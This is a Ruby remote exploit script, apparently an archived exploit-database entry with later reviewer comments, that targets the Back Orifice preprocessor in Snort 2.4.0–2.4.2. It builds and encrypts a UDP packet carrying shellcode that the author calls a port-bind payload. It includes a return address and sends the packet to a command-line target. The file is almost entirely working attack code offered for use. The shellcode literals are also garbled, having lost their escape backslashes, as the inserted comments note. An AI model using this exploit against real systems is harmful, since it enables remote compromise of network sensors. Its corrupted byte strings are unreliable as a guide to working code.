
# Title : Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)
# Published : 2005-11-11
# Author : xwings


#!/usr/bin/ruby -w

#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody needs to update the page
# 
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
# 
# 03:07 <@mark> hey xwings
# 03:07 <@mark> why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
# 
# 
#

require 'socket'

# Target and packet geometry. fathost is taken verbatim from the command line
# with no validation (nil when no argument is given); packetsize is the fixed
# total length of the datagram built below.
fathost         = ARGV[0]
packetsize      = 1069 # ret is 1069
targetport      = 9080

# Packet header: magic string, a 32-bit little-endian length field ("V"),
# an ID field and a one-byte type.
# NOTE(review): as archived, the backslash of every \x escape has been lost,
# so "xedxacxefx0d", "x01" and the literals below are plain ASCII text rather
# than the bytes the comments describe; every length computed from them
# (including filler below) is therefore based on the ASCII text lengths.
boheader =      "*!*QWTY?"  +
                [1096].pack("V")  +           # Length ,thanx Russell Sanford
                "xedxacxefx0d"+           # ID
                "x01"                        # PING

## Port Bind 3964 . connectback, refer to Russell Sanford's code

# Payload literal. The description above is the author's; nothing in this file
# decodes or checks the content.
shellcode =     "x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xe8"+
                "x8ex30x01x83xebxfcxe2xf4xd9x55x63x42xbbxe4x32x6b"+
                "x8exd6xa9x88x09x43xb0x97xabxdcx56x69xe7xf2x56x52"+
                "x61x6fx5ax67xb0xdex61x57x61x6fxfdx81x58xe8xe1xe2"+
                "x25x0ex62x53xbexcdxb9xe0x58xe8xfdx81x7bxe4x32x58"+
                "x58xb1xfdx81xa1xf7xc9xb1xe3xdcx58x2exc7xfdx58x69"+
                "xc7xecx59x6fx61x6dx62x52x61x6fxfdx81"

# Pad so that header + payload + filler reaches packetsize; the repeat count
# goes negative (empty string) if header and payload already exceed it.
filler =        "x90" * (packetsize-(boheader.length + shellcode.length))

# Four-byte value in native byte order ("L" is platform-endian, 32-bit).
retadd =        [0xbffff370].pack('L')

        
# Everything after the header, in the order it is sent.
darthcode = (shellcode+filler+retadd)

# Reset the key-stream generator used by mrand.
#
# The +seed+ argument is accepted for call-site compatibility but is not
# consulted: the state is always pinned to 31337.
#
# @param seed [Integer] ignored
# @return [Integer] the new state (31337)
def msrand(seed)
  @holdrand = 31_337
end

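# One step of a 32-bit linear congruential generator over @holdrand
# (multiplier 214013, increment 2531011), returning bits 16..30 of the
# new state, i.e. a value in 0..0x7fff.
#
# The original masked the two constants with 0xffffffff, which is a no-op,
# and never truncated the product, so @holdrand grew without bound as a
# bignum on every call. The state is now truncated to 32 bits after each
# step; bits 0..30 of the result depend only on bits 0..30 of the previous
# state, so the returned sequence is unchanged.
#
# @return [Integer] next value in 0..32767
def mrand
  @holdrand = (@holdrand * 214_013 + 2_531_011) & 0xffffffff
  (@holdrand >> 16) & 0x7fff
end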

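# XOR every byte of +takepayload+ with the low byte of successive mrand()
# outputs, after resetting the generator through msrand(0). Because msrand
# ignores its argument, the same key stream is applied on every call.
#
# Changes from the original: the payload is walked with each_byte instead of
# split(//) (under a multibyte source encoding split(//) yields multi-byte
# characters, and the unpack/join/to_i trick then produced wrong values),
# the result is built in one pack call instead of repeated String#+=, the
# redundant "@holdrand = 0" before msrand is dropped, and the @arrpayload
# instance variable, which nothing reads, is no longer set.
#
# @param takepayload [String] bytes to obfuscate
# @return [String] binary string with the same number of bytes
def bocrypt(takepayload)
  msrand(0)
  takepayload.each_byte.map { |byte| byte ^ (mrand % 256) }.pack('C*')
end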

# Sends one UDP datagram (header + payload, passed through bocrypt) to
# fathost:targetport. UDPSocket.open is called without a block, so the socket
# is never explicitly closed; the block form (UDPSocket.open { |s| ... })
# would close it. fathost is ARGV[0] and is nil when no argument was given.
UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport)
